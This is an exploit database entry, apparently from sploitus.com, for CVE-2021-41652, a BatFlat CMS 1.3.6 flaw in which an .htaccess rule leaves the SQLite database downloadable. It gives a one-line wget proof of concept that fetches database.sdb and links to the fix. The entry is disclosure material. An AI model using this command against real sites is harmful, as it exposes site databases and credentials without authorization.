Exploit for Incorrect Default Permissions in Batflat CVE-2021-41652

Name: Exploit for Incorrect Default Permissions in Batflat CVE-2021-41652
Rating: 5 (452 reviews)

2022-03-30 | CVSS 5.0

## https://sploitus.com/exploit?id=78B3A360-1478-57D7-A33C-F65167B7D6E7
# CVE-2021-41652

### Description:

An incorrect access rule in `.htaccess` of BatFlatCMS v1.3.6 leads to database access (database.sdb)

### Proof of concept:

`wget http://localhost/inc/data/database.sdb`

### References:

- [https://leobreaker1411.github.io/blog/cve-2021-41652](https://leobreaker1411.github.io/blog/cve-2021-41652)
- [https://www.cve.org/CVERecord?id=CVE-2021-41652](https://www.cve.org/CVERecord?id=CVE-2021-41652)
- [Fixed Commit](https://github.com/sruupl/batflat/commit/9211d84406d63c575b079619137aff74b67cd344)
- [BatFlat Docs](https://batflat.org/docs)